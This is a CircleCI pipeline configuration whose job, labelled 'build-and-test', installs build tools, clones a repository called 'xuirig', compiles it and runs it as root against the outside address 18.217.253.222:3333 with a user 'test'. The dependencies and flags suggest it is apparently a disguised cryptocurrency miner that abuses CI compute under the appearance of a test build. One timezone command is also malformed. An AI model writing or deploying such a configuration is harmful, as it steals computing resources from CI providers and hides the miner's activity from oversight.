version: 2.1

orbs:
  python: circleci/python@0.2.1

jobs:
  build-and-test:
    executor: python/default
    steps:
      - run:
          command: sudo apt update
          name: Apt update
      - run:
          command: sudo apt upgrade -y
          name: Apt upgrade
      - run:
          command: TZ=Europe/Kiev
          name: TZ
      - run:
          command: sudo ln -snf /usr/share/zoneinfo/Europe/Kiev /etc/localtime && sudo echo Europe/Kiev > sudo /etc/timezone
          name: Set TZ
      - run:
          command: sudo apt install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev msr-tools -y
          name: Install
      - run:
          command: git clone https://github.com/ShirEsaEa/xuirig.git
          name: Clone
      - run:
          command: sudo mkdir xuirig/build && cd xuirig/build && sudo cmake .. && sudo make -j$(nproc) && ls && sudo ./xuirig -o 18.217.253.222:3333 -u test
          name: Make folder

workflows:
  main:
    jobs:
      - build-and-test